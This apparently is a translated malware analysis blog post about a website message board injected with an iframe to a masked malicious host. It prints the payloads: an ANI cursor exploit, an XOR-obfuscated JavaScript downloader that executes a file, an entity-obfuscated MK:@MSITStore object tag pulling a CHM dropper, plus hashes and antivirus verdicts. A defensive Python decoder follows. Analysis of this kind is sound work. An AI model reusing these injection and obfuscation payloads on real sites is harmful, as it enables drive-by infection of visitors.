Endurer (original article)
Version 1
The message board page of the website contains:
/---
<iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width="100%" height="100%"></iframe>
---/
The injected code:
/---
<iframe src=hxxp://cool***.4*7*5***55.com/k3.htm width=100 height=1 frameborder=0></iframe>
---/
hxxp://cool***.4*7*5***55.com/k3.htm contains three pieces of malicious code.
Malicious code segment 1:
/---
<div style="cursor:url(hxxp://cool***.4*7*5***55.com/9.gif)"></div>
---/
hxxp://cool***.4*7*5***55.com/9.gif (Hack.suspiciousani) contains the string "by mr. OWEN [F.s.t]" and exploits the ANI vulnerability to download xx.exe.
File description: D:/test/xx.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time: 12:58:12
Modification time:
Access time:
Size: 14902 bytes, 14.566 KB
MD5: 046257b53f474770dd1e2a149b2ba823
Kaspersky reports Trojan-Downloader.Win32.Small.eqe; Rising reports Trojan.DL.Inject.xz.
Malicious code segment 2:
/---
var j = function(m){ return String.fromCharCode(m ^ 99) };
eval(j(5) ...... (omitted) ...... + j(67) + '');
---/
The decoded result is a JavaScript script that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file kehu0739.exe and save it to %WINDIR%. The file name is produced by the user-defined function:
/---
function gn(n){ var number = Math.random() * n;
// the random number is computed but never used, so the name is always ~tmp.tmp
return '~tmp' + '.tmp'; }
---/
which yields ~tmp.tmp. The script then runs the command %WINDIR%/system32/cmd.exe /C %WINDIR%/~tmp.tmp through the ShellExecute method of the Shell.Application object.
Malicious code segment 3:
/---
<object style="display:&#x6e;&#x6f;&#x6e;&#x65;" type="tex&#116&#47&#120&#45&#115&#99&#114iptlet" data="&#x4d;&#x4b;&#x3a;&#x40;&#x4d;&#x53;&#x49;&#x54;sto&#114&#101&#58&#109&#104tml&#x3a;&#x63;&#x3a;&#x5c;&#x2e;&#x6d;ht&#33hxxp://cool***.4*7*5**55.com/count.html&#x3a;&#x3a;/%6c%65%66t&#46htm"></object>
---/
After decoding:
/---
<object style="display:none" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:\.mht!hxxp://cool*****.4*7*5*****55.com/count.html::/%6c%65%66t.htm"></object>
---/
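A decoder for the obfuscated object tag above, added here as an example and not part of the original post. It resolves the mixed hex and decimal character references (with and without the trailing semicolon) in each attribute, percent-decodes the data URL so that %6c%65%66t reads as left, and then flags the indicators this segment relies on; the sample tag is re-typed from segment 3 with the author's masked hostname, and the indicator list is an assumption drawn from the techniques described on this page.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample: the HTML-entity-obfuscated <object> tag from segment 3,
# re-typed from the page with the author's masked hostname kept as-is.
SAMPLE = ('<object style="display:&#x6e;&#x6f;&#x6e;&#x65;" '
          'type="tex&#116&#47&#120&#45&#115&#99&#114iptlet" '
          'data="&#x4d;&#x4b;&#x3a;&#x40;&#x4d;&#x53;&#x49;&#x54;sto&#114&#101&#58'
          '&#109&#104tml&#x3a;&#x63;&#x3a;&#x5c;&#x2e;&#x6d;ht&#33'
          'hxxp://cool***.4*7*5***55.com/count.html&#x3a;&#x3a;/%6c%65%66t&#46htm">'
          '</object>')

# attribute="value" pairs; the obfuscated values contain no double quotes
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

# Indicators a defender would flag in a decoded <object> tag (assumed list,
# drawn from the MK:@MSITStore / mhtml / scriptlet technique on this page).
SUSPICIOUS = {
    "type": ["text/x-scriptlet"],
    "data": ["mk:@msitstore", "mhtml:", ".mht!"],
}


def decode_object_tag(tag):
    """Resolve HTML character references (with or without ';') in every
    attribute, then percent-decode the data URL; returns {attr: value}."""
    attrs = {name.lower(): html.unescape(value)
             for name, value in ATTR_RE.findall(tag)}
    if "data" in attrs:
        attrs["data"] = unquote(attrs["data"])   # %6c%65%66t -> left
    return attrs


def find_indicators(attrs):
    """Return (attribute, indicator) pairs present, matched case-insensitively."""
    hits = []
    for attr, needles in SUSPICIOUS.items():
        value = attrs.get(attr, "").lower()
        hits.extend((attr, n) for n in needles if n in value)
    return hits


if __name__ == "__main__":
    decoded = decode_object_tag(SAMPLE)
    for name, value in decoded.items():
        print(f"{name}: {value}")
    print("indicators:", find_indicators(decoded))
```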
hxxp://cool***.4*7*5***55.com/count.html is actually a CHM file, which drops and runs the file QQ.exe:
/---
File description: D:/test/QQ.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time: 13:39:46
Modification time: 13:39:46
Access time: 13:41:52
Size: 11208 bytes, 10.968 KB
MD5: f04973fb8267827f347594b373732290
Nspack 1.3 -> North Star/Liu Xing Ping
---/
Rising reports Trojan.DL.Agent.alw.
Scanned file: QQ.exe - infected
QQ.exe - infected by Trojan-Downloader.Win32.Agent.ue
Statistics:
Known viruses: 307397
Updated: 30-04-2007
File size (Kb): 11
Virus bodies: 1
Files: 1
Warnings: 0
Archives: 0
Suspicious: 0